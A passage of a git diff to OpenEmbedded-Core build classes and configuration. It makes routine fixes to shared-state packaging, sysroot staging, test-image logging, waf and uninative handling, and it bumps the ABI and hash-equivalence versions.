manifests = f.readlines()
+ # We append new entries, we don't remove older entries which may have the same
+ # manifest name but different versions from stamp/workdir. See below.
if filedata not in manifests:
with open(i, "a+") as f:
f.write(filedata)
@@ -477,7 +481,7 @@ def sstate_clean_cachefiles(d):
ss = sstate_state_fromvars(ld, task)
sstate_clean_cachefile(ss, ld)
-def sstate_clean_manifest(manifest, d, prefix=None):
+def sstate_clean_manifest(manifest, d, canrace=False, prefix=None):
import oe.path
mfile = open(manifest)
@@ -495,7 +499,9 @@ def sstate_clean_manifest(manifest, d, prefix=None):
if entry.endswith("/"):
if os.path.islink(entry[:-1]):
os.remove(entry[:-1])
- elif os.path.exists(entry) and len(os.listdir(entry)) == 0:
+ elif os.path.exists(entry) and len(os.listdir(entry)) == 0 and not canrace:
+ # Removing directories whilst builds are in progress exposes a race. Only
+ # do it in contexts where it is safe to do so.
os.rmdir(entry[:-1])
else:
os.remove(entry)
@@ -533,7 +539,7 @@ def sstate_clean(ss, d):
for lock in ss['lockfiles']:
locks.append(bb.utils.lockfile(lock))
- sstate_clean_manifest(manifest, d)
+ sstate_clean_manifest(manifest, d, canrace=True)
for lock in locks:
bb.utils.unlockfile(lock)
@@ -634,10 +640,21 @@ python sstate_hardcode_path () {
def sstate_package(ss, d):
import oe.path
+ import time
tmpdir = d.getVar('TMPDIR')
+ fixtime = False
+ if ss['task'] == "package":
+ fixtime = True
+
+ def fixtimestamp(root, path):
+ f = os.path.join(root, path)
+ if os.lstat(f).st_mtime > sde:
+ os.utime(f, (sde, sde), follow_symlinks=False)
+
sstatebuild = d.expand("${WORKDIR}/sstate-build-%s/" % ss['task'])
+ sde = int(d.getVar("SOURCE_DATE_EPOCH") or time.time())
d.setVar("SSTATE_CURRTASK", ss['task'])
bb.utils.remove(sstatebuild, recurse=True)
bb.utils.mkdirhier(sstatebuild)
@@ -650,6 +667,8 @@ def sstate_package(ss, d):
# to sstate tasks but there aren't many of these so better just avoid them entirely.
for walkroot, dirs, files in os.walk(state[1]):
for file in files + dirs:
+ if fixtime:
+ fixtimestamp(walkroot, file)
srcpath = os.path.join(walkroot, file)
if not os.path.islink(srcpath):
continue
@@ -671,6 +690,11 @@ def sstate_package(ss, d):
bb.utils.mkdirhier(plain)
bb.utils.mkdirhier(pdir)
os.rename(plain, pdir)
+ if fixtime:
+ fixtimestamp(pdir, "")
+ for walkroot, dirs, files in os.walk(pdir):
+ for file in files + dirs:
+ fixtimestamp(walkroot, file)
d.setVar('SSTATE_BUILDDIR', sstatebuild)
d.setVar('SSTATE_INSTDIR', sstatebuild)
@@ -697,9 +721,16 @@ def sstate_package(ss, d):
os.utime(siginfo, None)
except PermissionError:
pass
+ except OSError as e:
+ # Handle read-only file systems gracefully
+ import errno
+ if e.errno != errno.EROFS:
+ raise e
return
+sstate_package[vardepsexclude] += "SSTATE_SIG_KEY"
+
def pstaging_fetch(sstatefetch, d):
import bb.fetch2
@@ -783,7 +814,7 @@ sstate_task_postfunc[dirs] = "${WORKDIR}"
sstate_create_package () {
# Exit early if it already exists
if [ -e ${SSTATE_PKG} ]; then
- [ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG}
+ touch ${SSTATE_PKG} 2>/dev/null || true
return
fi
@@ -810,14 +841,18 @@ sstate_create_package () {
fi
chmod 0664 $TFILE
# Skip if it was already created by some other process
- if [ ! -e ${SSTATE_PKG} ]; then
+ if [ -h ${SSTATE_PKG} ] && [ ! -e ${SSTATE_PKG} ]; then
+ # There is a symbolic link, but it links to nothing.
+ # Forcefully replace it with the new file.
+ ln -f $TFILE ${SSTATE_PKG} || true
+ elif [ ! -e ${SSTATE_PKG} ]; then
# Move into place using ln to attempt an atomic op.
# Abort if it already exists
- ln $TFILE ${SSTATE_PKG} && rm $TFILE
+ ln $TFILE ${SSTATE_PKG} || true
else
- rm $TFILE
+ touch ${SSTATE_PKG} 2>/dev/null || true
fi
- [ ! -w ${SSTATE_PKG} ] || touch ${SSTATE_PKG}
+ rm $TFILE
}
python sstate_sign_package () {
@@ -846,12 +881,12 @@ python sstate_report_unihash() {
#
sstate_unpack_package () {
tar -xvzf ${SSTATE_PKG}
- # update .siginfo atime on local/NFS mirror
- [ -O ${SSTATE_PKG}.siginfo ] && [ -w ${SSTATE_PKG}.siginfo ] && [ -h ${SSTATE_PKG}.siginfo ] && touch -a ${SSTATE_PKG}.siginfo
- # Use "! -w ||" to return true for read only files
- [ ! -w ${SSTATE_PKG} ] || touch --no-dereference ${SSTATE_PKG}
- [ ! -w ${SSTATE_PKG}.sig ] || [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig
- [ ! -w ${SSTATE_PKG}.siginfo ] || [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo
+ # update .siginfo atime on local/NFS mirror if it is a symbolic link
+ [ ! -h ${SSTATE_PKG}.siginfo ] || [ ! -e ${SSTATE_PKG}.siginfo ] || touch -a ${SSTATE_PKG}.siginfo 2>/dev/null || true
+ # update each symbolic link instead of any referenced file
+ touch --no-dereference ${SSTATE_PKG} 2>/dev/null || true
+ [ ! -e ${SSTATE_PKG}.sig ] || touch --no-dereference ${SSTATE_PKG}.sig 2>/dev/null || true
+ [ ! -e ${SSTATE_PKG}.siginfo ] || touch --no-dereference ${SSTATE_PKG}.siginfo 2>/dev/null || true
}
BB_HASHCHECK_FUNCTION = "sstate_checkhashes"
@@ -926,7 +961,7 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
localdata2 = bb.data.createCopy(localdata)
srcuri = "file://" + sstatefile
- localdata.setVar('SRC_URI', srcuri)
+ localdata2.setVar('SRC_URI', srcuri)
bb.debug(2, "SState: Attempting to fetch %s" % srcuri)
try:
@@ -937,10 +972,11 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
found.add(tid)
if tid in missed:
missed.remove(tid)
- except:
+ except bb.fetch2.FetchError as e:
missed.add(tid)
- bb.debug(2, "SState: Unsuccessful fetch test for %s" % srcuri)
- pass
+ bb.debug(2, "SState: Unsuccessful fetch test for %s (%s)" % (srcuri, e))
+ except Exception as e:
+ bb.error("SState: cannot test %s: %s" % (srcuri, e))
if len(tasklist) >= min_tasks:
bb.event.fire(bb.event.ProcessProgress(msg, len(tasklist) - thread_worker.tasks.qsize()), d)
@@ -1002,6 +1038,7 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
bb.parse.siggen.checkhashes(sq_data, missed, found, d)
return found
+setscene_depvalid[vardepsexclude] = "SSTATE_EXCLUDEDEPS_SYSROOT"
BB_SETSCENE_DEPVALID = "setscene_depvalid"
@@ -1027,6 +1064,10 @@ def setscene_depvalid(task, taskdependees, notneeded, d, log=None):
if taskdependees[task][1] == "do_populate_lic":
return True
+ # We only need to trigger deploy_source_date_epoch through direct dependencies
+ if taskdependees[task][1] == "do_deploy_source_date_epoch":
+ return True
+
# stash_locale and gcc_stash_builddir are never needed as a dependency for built objects
if taskdependees[task][1] == "do_stash_locale" or taskdependees[task][1] == "do_gcc_stash_builddir":
return True
@@ -1133,6 +1174,11 @@ python sstate_eventhandler() {
os.utime(siginfo, None)
except PermissionError:
pass
+ except OSError as e:
+ # Handle read-only file systems gracefully
+ import errno
+ if e.errno != errno.EROFS:
+ raise e
}
@@ -1171,11 +1217,21 @@ python sstate_eventhandler2() {
i = d.expand("${SSTATE_MANIFESTS}/index-" + a)
if not os.path.exists(i):
continue
+ manseen = set()
+ ignore = []
with open(i, "r") as f:
lines = f.readlines()
- for l in lines:
+ for l in reversed(lines):
try:
(stamp, manifest, workdir) = l.split()
+ # The index may have multiple entries for the same manifest as the code above only appends
+ # new entries and there may be an entry with matching manifest but differing version in stamp/workdir.
+ # The last entry in the list is the valid one, any earlier entries with matching manifests
+ # should be ignored.
+ if manifest in manseen:
+ ignore.append(l)
+ continue
+ manseen.add(manifest)
if stamp not in stamps and stamp not in preservestamps and stamp in machineindex:
toremove.append(l)
if stamp not in seen:
@@ -1206,6 +1262,8 @@ python sstate_eventhandler2() {
with open(i, "w") as f:
for l in lines:
+ if l in ignore:
+ continue
f.write(l)
machineindex |= set(stamps)
with open(mi, "w") as f:
diff --git a/meta/classes/staging.bbclass b/meta/classes/staging.bbclass
index 5b04f88b2d..21523c8f75 100644
--- a/meta/classes/staging.bbclass
+++ b/meta/classes/staging.bbclass
@@ -27,11 +27,15 @@ SYSROOT_DIRS_BLACKLIST = " \
${mandir} \
${docdir} \
${infodir} \
+ ${datadir}/X11/locale \
${datadir}/applications \
+ ${datadir}/bash-completion \
${datadir}/fonts \
${datadir}/gtk-doc/html \
+ ${datadir}/installed-tests \
${datadir}/locale \
${datadir}/pixmaps \
+ ${datadir}/terminfo \
${libdir}/${BPN}/ptest \
"
@@ -263,6 +267,10 @@ python extend_recipe_sysroot() {
pn = d.getVar("PN")
stagingdir = d.getVar("STAGING_DIR")
sharedmanifests = d.getVar("COMPONENTS_DIR") + "/manifests"
+ # only needed by multilib cross-canadian since it redefines RECIPE_SYSROOT
+ manifestprefix = d.getVar("RECIPE_SYSROOT_MANIFEST_SUBDIR")
+ if manifestprefix:
+ sharedmanifests = sharedmanifests + "/" + manifestprefix
recipesysroot = d.getVar("RECIPE_SYSROOT")
recipesysrootnative = d.getVar("RECIPE_SYSROOT_NATIVE")
@@ -404,7 +412,7 @@ python extend_recipe_sysroot() {
if os.path.islink(f) and not os.path.exists(f):
bb.note("%s no longer exists, removing from sysroot" % f)
lnk = os.readlink(f.replace(".complete", ""))
- sstate_clean_manifest(depdir + "/" + lnk, d, workdir)
+ sstate_clean_manifest(depdir + "/" + lnk, d, canrace=True, prefix=workdir)
os.unlink(f)
os.unlink(f.replace(".complete", ""))
@@ -449,7 +457,7 @@ python extend_recipe_sysroot() {
fl = depdir + "/" + l
bb.note("Task %s no longer depends on %s, removing from sysroot" % (mytaskname, l))
lnk = os.readlink(fl)
- sstate_clean_manifest(depdir + "/" + lnk, d, workdir)
+ sstate_clean_manifest(depdir + "/" + lnk, d, canrace=True, prefix=workdir)
os.unlink(fl)
os.unlink(fl + ".complete")
@@ -470,7 +478,7 @@ python extend_recipe_sysroot() {
continue
else:
bb.note("%s exists in sysroot, but is stale (%s vs. %s), removing." % (c, lnk, c + "." + taskhash))
- sstate_clean_manifest(depdir + "/" + lnk, d, workdir)
+ sstate_clean_manifest(depdir + "/" + lnk, d, canrace=True, prefix=workdir)
os.unlink(depdir + "/" + c)
if os.path.lexists(depdir + "/" + c + ".complete"):
os.unlink(depdir + "/" + c + ".complete")
diff --git a/meta/classes/systemd.bbclass b/meta/classes/systemd.bbclass
index 9e8a82c9f1..a4bff732b9 100644
--- a/meta/classes/systemd.bbclass
+++ b/meta/classes/systemd.bbclass
@@ -174,7 +174,8 @@ python systemd_populate_packages() {
if path_found != '':
systemd_add_files_and_parse(pkg_systemd, path_found, service, keys)
else:
- bb.fatal("SYSTEMD_SERVICE_%s value %s does not exist" % (pkg_systemd, service))
+ bb.fatal("Didn't find service unit '{0}', specified in SYSTEMD_SERVICE_{1}. {2}".format(
+ service, pkg_systemd, "Also looked for service unit '{0}'.".format(base) if base is not None else ""))
def systemd_create_presets(pkg, action):
presetf = oe.path.join(d.getVar("PKGD"), d.getVar("systemd_unitdir"), "system-preset/98-%s.preset" % pkg)
diff --git a/meta/classes/testimage.bbclass b/meta/classes/testimage.bbclass
index c709384b91..7c8b2b30a1 100644
--- a/meta/classes/testimage.bbclass
+++ b/meta/classes/testimage.bbclass
@@ -99,30 +99,9 @@ TESTIMAGE_DUMP_DIR ?= "${LOG_DIR}/runtime-hostdump/"
TESTIMAGE_UPDATE_VARS ?= "DL_DIR WORKDIR DEPLOY_DIR"
testimage_dump_target () {
- top -bn1
- ps
- free
- df
- # The next command will export the default gateway IP
- export DEFAULT_GATEWAY=$(ip route | awk '/default/ { print $3}')
- ping -c3 $DEFAULT_GATEWAY
- dmesg
- netstat -an
- ip address
- # Next command will dump logs from /var/log/
- find /var/log/ -type f 2>/dev/null -exec echo "====================" \; -exec echo {} \; -exec echo "====================" \; -exec cat {} \; -exec echo "" \;
}
testimage_dump_host () {
- top -bn1
- iostat -x -z -N -d -p ALL 20 2
- ps -ef
- free
- df
- memstat
- dmesg
- ip -s link
- netstat -an
}
python do_testimage() {
@@ -193,6 +172,7 @@ def testimage_main(d):
import json
import signal
import logging
+ import shutil
from bb.utils import export_proxies
from oeqa.core.utils.misc import updateTestData
@@ -228,9 +208,10 @@ def testimage_main(d):
tdname = "%s.testdata.json" % image_name
try:
- td = json.load(open(tdname, "r"))
- except (FileNotFoundError) as err:
- bb.fatal('File %s Not Found. Have you built the image with INHERIT+="testimage" in the conf/local.conf?' % tdname)
+ with open(tdname, "r") as f:
+ td = json.load(f)
+ except FileNotFoundError as err:
+ bb.fatal('File %s not found (%s).\nHave you built the image with INHERIT += "testimage" in the conf/local.conf?' % (tdname, err))
# Some variables need to be updates (mostly paths) with the
# ones of the current environment because some tests require them.
@@ -397,10 +378,17 @@ def testimage_main(d):
get_testimage_result_id(configuration),
dump_streams=d.getVar('TESTREPORT_FULLLOGS'))
results.logSummary(pn)
+
+ # Copy additional logs to tmp/log/oeqa so it's easier to find them
+ targetdir = os.path.join(get_testimage_json_result_dir(d), d.getVar("PN"))
+ os.makedirs(targetdir, exist_ok=True)
+ os.symlink(bootlog, os.path.join(targetdir, os.path.basename(bootlog)))
+ os.symlink(d.getVar("BB_LOGFILE"), os.path.join(targetdir, os.path.basename(d.getVar("BB_LOGFILE") + "." + d.getVar('DATETIME'))))
+
if not results or not complete:
- bb.fatal('%s - FAILED - tests were interrupted during execution' % pn, forcelog=True)
+ bb.fatal('%s - FAILED - tests were interrupted during execution, check the logs in %s' % (pn, d.getVar("LOG_DIR")), forcelog=True)
if not results.wasSuccessful():
- bb.fatal('%s - FAILED - check the task log and the ssh log' % pn, forcelog=True)
+ bb.fatal('%s - FAILED - also check the logs in %s' % (pn, d.getVar("LOG_DIR")), forcelog=True)
def get_runtime_paths(d):
"""
diff --git a/meta/classes/toolchain-scripts.bbclass b/meta/classes/toolchain-scripts.bbclass
index db1d3215ef..21762b803b 100644
--- a/meta/classes/toolchain-scripts.bbclass
+++ b/meta/classes/toolchain-scripts.bbclass
@@ -29,7 +29,7 @@ toolchain_create_sdk_env_script () {
echo '# http://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html#AEN80' >> $script
echo '# http://xahlee.info/UnixResource_dir/_/ldpath.html' >> $script
echo '# Only disable this check if you are absolutely know what you are doing!' >> $script
- echo 'if [ ! -z "$LD_LIBRARY_PATH" ]; then' >> $script
+ echo 'if [ ! -z "${LD_LIBRARY_PATH:-}" ]; then' >> $script
echo " echo \"Your environment is misconfigured, you probably need to 'unset LD_LIBRARY_PATH'\"" >> $script
echo " echo \"but please check why this was set in the first place and that it's safe to unset.\"" >> $script
echo ' echo "The SDK will not operate correctly in most cases when LD_LIBRARY_PATH is set."' >> $script
@@ -44,7 +44,7 @@ toolchain_create_sdk_env_script () {
for i in ${CANADIANEXTRAOS}; do
EXTRAPATH="$EXTRAPATH:$sdkpathnative$bindir/${TARGET_ARCH}${TARGET_VENDOR}-$i"
done
- echo "export PATH=$sdkpathnative$bindir:$sdkpathnative$sbindir:$sdkpathnative$base_bindir:$sdkpathnative$base_sbindir:$sdkpathnative$bindir/../${HOST_SYS}/bin:$sdkpathnative$bindir/${TARGET_SYS}"$EXTRAPATH':$PATH' >> $script
+ echo "export PATH=$sdkpathnative$bindir:$sdkpathnative$sbindir:$sdkpathnative$base_bindir:$sdkpathnative$base_sbindir:$sdkpathnative$bindir/../${HOST_SYS}/bin:$sdkpathnative$bindir/${TARGET_SYS}"$EXTRAPATH':"$PATH"' >> $script
echo 'export PKG_CONFIG_SYSROOT_DIR=$SDKTARGETSYSROOT' >> $script
echo 'export PKG_CONFIG_PATH=$SDKTARGETSYSROOT'"$libdir"'/pkgconfig:$SDKTARGETSYSROOT'"$prefix"'/share/pkgconfig' >> $script
echo 'export CONFIG_SITE=${SDKPATH}/site-config-'"${multimach_target_sys}" >> $script
diff --git a/meta/classes/uboot-extlinux-config.bbclass b/meta/classes/uboot-extlinux-config.bbclass
index f4bf94be04..be285daa01 100644
--- a/meta/classes/uboot-extlinux-config.bbclass
+++ b/meta/classes/uboot-extlinux-config.bbclass
@@ -153,5 +153,6 @@ python do_create_extlinux_config() {
}
UBOOT_EXTLINUX_VARS = "CONSOLE MENU_DESCRIPTION ROOT KERNEL_IMAGE FDTDIR FDT KERNEL_ARGS INITRD"
do_create_extlinux_config[vardeps] += "${@' '.join(['UBOOT_EXTLINUX_%s_%s' % (v, l) for v in d.getVar('UBOOT_EXTLINUX_VARS').split() for l in d.getVar('UBOOT_EXTLINUX_LABELS').split()])}"
+do_create_extlinux_config[vardepsexclude] += "OVERRIDES"
addtask create_extlinux_config before do_install do_deploy after do_compile
diff --git a/meta/classes/uninative.bbclass b/meta/classes/uninative.bbclass
index 1e19917a97..4d4f53ad4d 100644
--- a/meta/classes/uninative.bbclass
+++ b/meta/classes/uninative.bbclass
@@ -2,7 +2,7 @@ UNINATIVE_LOADER ?= "${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/lib/
UNINATIVE_STAGING_DIR ?= "${STAGING_DIR}"
UNINATIVE_URL ?= "unset"
-UNINATIVE_TARBALL ?= "${BUILD_ARCH}-nativesdk-libc.tar.xz"
+UNINATIVE_TARBALL ?= "${BUILD_ARCH}-nativesdk-libc-${UNINATIVE_VERSION}.tar.xz"
# Example checksums
#UNINATIVE_CHECKSUM[aarch64] = "dead"
#UNINATIVE_CHECKSUM[i686] = "dead"
@@ -34,6 +34,8 @@ python uninative_event_fetchloader() {
with open(loaderchksum, "r") as f:
readchksum = f.read().strip()
if readchksum == chksum:
+ if "uninative" not in d.getVar("SSTATEPOSTUNPACKFUNCS"):
+ enable_uninative(d)
return
import subprocess
@@ -100,7 +102,7 @@ ${UNINATIVE_STAGING_DIR}-uninative/relocate_sdk.py \
${UNINATIVE_LOADER} \
${UNINATIVE_LOADER} \
${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/${bindir_native}/patchelf-uninative \
- ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so" % chksum)
+ ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so*" % chksum)
subprocess.check_output(cmd, shell=True)
with open(loaderchksum, "w") as f:
@@ -167,5 +169,7 @@ python uninative_changeinterp () {
if not elf.isDynamic():
continue
+ os.chmod(f, s[stat.ST_MODE] | stat.S_IWUSR)
subprocess.check_output(("patchelf-uninative", "--set-interpreter", d.getVar("UNINATIVE_LOADER"), f), stderr=subprocess.STDOUT)
+ os.chmod(f, s[stat.ST_MODE])
}
diff --git a/meta/classes/useradd-staticids.bbclass b/meta/classes/useradd-staticids.bbclass
index 3a1b5f1320..908b24969f 100644
--- a/meta/classes/useradd-staticids.bbclass
+++ b/meta/classes/useradd-staticids.bbclass
@@ -41,7 +41,7 @@ def update_useradd_static_config(d):
def handle_missing_id(id, type, pkg, files, var, value):
# For backwards compatibility we accept "1" in addition to "error"
error_dynamic = d.getVar('USERADD_ERROR_DYNAMIC')
- msg = "%s - %s: %sname %s does not have a static ID defined." % (d.getVar('PN'), pkg, type, id)
+ msg = 'Recipe %s, package %s: %sname "%s" does not have a static ID defined.' % (d.getVar('PN'), pkg, type, id)
if files:
msg += " Add %s to one of these files: %s" % (id, files)
else:
diff --git a/meta/classes/useradd.bbclass b/meta/classes/useradd.bbclass
index e5f3ba24f9..0f0ed3446d 100644
--- a/meta/classes/useradd.bbclass
+++ b/meta/classes/useradd.bbclass
@@ -230,6 +230,10 @@ fakeroot python populate_packages_prepend () {
preinst += 'perform_useradd () {\n%s}\n' % d.getVar('perform_useradd')
preinst += 'perform_groupmems () {\n%s}\n' % d.getVar('perform_groupmems')
preinst += d.getVar('useradd_preinst')
+ # Expand out the *_PARAM variables to the package specific versions
+ for rep in ["GROUPADD_PARAM", "USERADD_PARAM", "GROUPMEMS_PARAM"]:
+ val = d.getVar(rep + "_" + pkg) or ""
+ preinst = preinst.replace("${" + rep + "}", val)
d.setVar('pkg_preinst_%s' % pkg, preinst)
# RDEPENDS setup
diff --git a/meta/classes/utils.bbclass b/meta/classes/utils.bbclass
index cd3d05709e..99f68f7505 100644
--- a/meta/classes/utils.bbclass
+++ b/meta/classes/utils.bbclass
@@ -233,7 +233,7 @@ create_cmdline_wrapper () {
#!/bin/bash
realpath=\`readlink -fn \$0\`
realdir=\`dirname \$realpath\`
-exec -a \`dirname \$realpath\`/$cmdname \`dirname \$realpath\`/$cmdname.real $cmdoptions "\$@"
+exec -a \$realdir/$cmdname \$realdir/$cmdname.real $cmdoptions "\$@"
END
chmod +x $cmd
}
diff --git a/meta/classes/waf.bbclass b/meta/classes/waf.bbclass
index 900244004e..8fa5063645 100644
--- a/meta/classes/waf.bbclass
+++ b/meta/classes/waf.bbclass
@@ -1,10 +1,19 @@
# avoids build breaks when using no-static-libs.inc
DISABLE_STATIC = ""
+# What Python interpretter to use. Defaults to Python 3 but can be
+# overridden if required.
+WAF_PYTHON ?= "python3"
+
B = "${WORKDIR}/build"
EXTRA_OECONF_append = " ${PACKAGECONFIG_CONFARGS}"
+EXTRA_OEWAF_BUILD ??= ""
+# In most cases, you want to pass the same arguments to `waf build` and `waf
+# install`, but you can override it if necessary
+EXTRA_OEWAF_INSTALL ??= "${EXTRA_OEWAF_BUILD}"
+
def waflock_hash(d):
# Calculates the hash used for the waf lock file. This should include
# all of the user controllable inputs passed to waf configure. Note
@@ -35,9 +44,10 @@ python waf_preconfigure() {
import subprocess
from distutils.version import StrictVersion
subsrcdir = d.getVar('S')
+ python = d.getVar('WAF_PYTHON')
wafbin = os.path.join(subsrcdir, 'waf')
try:
- result = subprocess.check_output([wafbin, '--version'], cwd=subsrcdir, stderr=subprocess.STDOUT)
+ result = subprocess.check_output([python, wafbin, '--version'], cwd=subsrcdir, stderr=subprocess.STDOUT)
version = result.decode('utf-8').split()[1]
if StrictVersion(version) >= StrictVersion("1.8.7"):
d.setVar("WAF_EXTRA_CONF", "--bindir=${bindir} --libdir=${libdir}")
@@ -50,16 +60,16 @@ python waf_preconfigure() {
do_configure[prefuncs] += "waf_preconfigure"
waf_do_configure() {
- (cd ${S} && ./waf configure -o ${B} --prefix=${prefix} ${WAF_EXTRA_CONF} ${EXTRA_OECONF})
+ (cd ${S} && ${WAF_PYTHON} ./waf configure -o ${B} --prefix=${prefix} ${WAF_EXTRA_CONF} ${EXTRA_OECONF})
}
do_compile[progress] = "outof:^\[\s*(\d+)/\s*(\d+)\]\s+"
waf_do_compile() {
- (cd ${S} && ./waf build ${@oe.utils.parallel_make_argument(d, '-j%d', limit=64)})
+ (cd ${S} && ${WAF_PYTHON} ./waf build ${@oe.utils.parallel_make_argument(d, '-j%d', limit=64)} ${EXTRA_OEWAF_BUILD})
}
waf_do_install() {
- (cd ${S} && ./waf install --destdir=${D})
+ (cd ${S} && ${WAF_PYTHON} ./waf install --destdir=${D} ${EXTRA_OEWAF_INSTALL})
}
EXPORT_FUNCTIONS do_configure do_compile do_install
diff --git a/meta/conf/abi_version.conf b/meta/conf/abi_version.conf
index 2bdc55695b..35faef9a36 100644
--- a/meta/conf/abi_version.conf
+++ b/meta/conf/abi_version.conf
@@ -4,7 +4,7 @@
# that breaks the format and have been previously discussed on the mailing list
# with general agreement from the core team.
#
-OELAYOUT_ABI = "12"
+OELAYOUT_ABI = "14"
#
# HASHEQUIV_HASH_VERSION is injected into the output hash calculation used by
@@ -12,4 +12,4 @@ OELAYOUT_ABI = "12"
# a reset of the equivalence, for example when reproducibility issues break the
# existing match data. Distros can also append to this value for the same effect.
#
-HASHEQUIV_HASH_VERSION = "1"
+HASHEQUIV_HASH_VERSION = "5"
diff --git a/meta/conf/bitbake.conf b/meta/conf/bitbake.conf
index bdade79abe..457b7790c2 100644
--- a/meta/conf/bitbake.conf
+++ b/meta/conf/bitbake.conf
@@ -208,6 +208,7 @@ PF = "${PN}-${EXTENDPE}${PV}-${PR}"
EXTENDPE = "${@['','${PE}_'][int(d.getVar('PE') or 0) > 0]}"
P = "${PN}-${PV}"
+PRSERV_PV_AUTOINC = "AUTOINC"
PRAUTO = ""
EXTENDPRAUTO = "${@['.${PRAUTO}', ''][not d.getVar('PRAUTO')]}"
PRAUTOINX = "${PF}"
@@ -420,8 +421,10 @@ PKGDATA_DIR = "${TMPDIR}/pkgdata/${MACHINE}"
SDK_NAME_PREFIX ?= "oecore"
SDK_NAME = "${SDK_NAME_PREFIX}-${SDK_ARCH}-${TUNE_PKGARCH}"
-SDKPATH = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}"
+SDKPATH = "/usr/local/oe-sdk-hardcoded-buildpath"
SDKPATHNATIVE = "${SDKPATH}/sysroots/${SDK_SYS}"
+# The path to default to installing the SDK to
+SDKPATHINSTALL = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}"
##################################################################
# Kernel info.
@@ -479,7 +482,7 @@ export PATH
# Build utility info.
##################################################################
-# Directory where host tools are copied
+# Directory with symlinks to host tools used by build
HOSTTOOLS_DIR = "${TMPDIR}/hosttools"
# Tools needed to run builds with OE-Core
@@ -499,7 +502,7 @@ HOSTTOOLS += " \
HOSTTOOLS += "${@'ip ping ps scp ssh stty' if (bb.utils.contains_any('IMAGE_CLASSES', 'testimage testsdk', True, False, d) or any(x in (d.getVar("BBINCLUDED") or "") for x in ["testimage.bbclass", "testsdk.bbclass"])) else ''}"
# Link to these if present
-HOSTTOOLS_NONFATAL += "aws gcc-ar gpg ld.bfd ld.gold nc pigz sftp socat ssh sudo"
+HOSTTOOLS_NONFATAL += "aws gcc-ar gpg gpg-agent ld.bfd ld.gold nc pigz sftp socat ssh sudo"
# Temporary add few more detected in bitbake world
HOSTTOOLS_NONFATAL += "join nl size yes zcat"
@@ -638,7 +641,7 @@ APACHE_MIRROR = "https://archive.apache.org/dist"
DEBIAN_MIRROR = "http://ftp.debian.org/debian/pool"
GENTOO_MIRROR = "http://distfiles.gentoo.org/distfiles"
GNOME_GIT = "git://gitlab.gnome.org/GNOME"
-GNOME_MIRROR = "https://ftp.gnome.org/pub/GNOME/sources"
+GNOME_MIRROR = "https://download.gnome.org/sources/"
GNU_MIRROR = "https://ftp.gnu.org/gnu"
GNUPG_MIRROR = "https://www.gnupg.org/ftp/gcrypt"
GPE_MIRROR = "http://gpe.linuxtogo.org/download/source"
@@ -686,13 +689,18 @@ SRC_URI = ""
PSEUDO_LOCALSTATEDIR ?= "${WORKDIR}/pseudo/"
PSEUDO_PASSWD ?= "${STAGING_DIR_TARGET}:${PSEUDO_SYSROOT}"
PSEUDO_SYSROOT = "${COMPONENTS_DIR}/${BUILD_ARCH}/pseudo-native"
+PSEUDO_IGNORE_PATHS = "/usr/,/etc/,/lib,/dev/,/run/,${T},${WORKDIR}/recipe-sysroot,${SSTATE_DIR},${STAMPS_DIR}"
+PSEUDO_IGNORE_PATHS .= ",${TMPDIR}/sstate-control,${TMPDIR}/buildstats,${TMPDIR}/sysroots-components,${TMPDIR}/pkgdata"
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/deploy-,${WORKDIR}/sstate-build-package_,${WORKDIR}/sstate-install-package_,${WORKDIR}/pkgdata-sysroot"
+PSEUDO_IGNORE_PATHS .= ",${DEPLOY_DIR},${BUILDHISTORY_DIR},${TOPDIR}/cache,${COREBASE}/scripts,${CCACHE_DIR}"
+
export PSEUDO_DISABLED = "1"
#export PSEUDO_PREFIX = "${STAGING_DIR_NATIVE}${prefix_native}"
#export PSEUDO_BINDIR = "${STAGING_DIR_NATIVE}${bindir_native}"
#export PSEUDO_LIBDIR = "${STAGING_DIR_NATIVE}$PSEUDOBINDIR/../lib/pseudo/lib
-FAKEROOTBASEENV = "PSEUDO_BINDIR=${PSEUDO_SYSROOT}${bindir_native} PSEUDO_LIBDIR=${PSEUDO_SYSROOT}${prefix_native}/lib/pseudo/lib PSEUDO_PREFIX=${PSEUDO_SYSROOT}${prefix_native} PSEUDO_DISABLED=1"
+FAKEROOTBASEENV = "PSEUDO_BINDIR=${PSEUDO_SYSROOT}${bindir_native} PSEUDO_LIBDIR=${PSEUDO_SYSROOT}${prefix_native}/lib/pseudo/lib PSEUDO_PREFIX=${PSEUDO_SYSROOT}${prefix_native} PSEUDO_IGNORE_PATHS=${@oe.path.canonicalize(d.getVar('PSEUDO_IGNORE_PATHS'))} PSEUDO_DISABLED=1 PYTHONDONTWRITEBYTECODE=1"
FAKEROOTCMD = "${PSEUDO_SYSROOT}${bindir_native}/pseudo"
-FAKEROOTENV = "PSEUDO_PREFIX=${PSEUDO_SYSROOT}${prefix_native} PSEUDO_LOCALSTATEDIR=${PSEUDO_LOCALSTATEDIR} PSEUDO_PASSWD=${PSEUDO_PASSWD} PSEUDO_NOSYMLINKEXP=1 PSEUDO_DISABLED=0"
+FAKEROOTENV = "PSEUDO_PREFIX=${PSEUDO_SYSROOT}${prefix_native} PSEUDO_LOCALSTATEDIR=${PSEUDO_LOCALSTATEDIR} PSEUDO_PASSWD=${PSEUDO_PASSWD} PSEUDO_NOSYMLINKEXP=1 PSEUDO_IGNORE_PATHS=${@oe.path.canonicalize(d.getVar('PSEUDO_IGNORE_PATHS'))} PSEUDO_DISABLED=0"
FAKEROOTNOENV = "PSEUDO_UNLOAD=1"
FAKEROOTDIRS = "${PSEUDO_LOCALSTATEDIR}"
PREFERRED_PROVIDER_virtual/fakeroot-native ?= "pseudo-native"
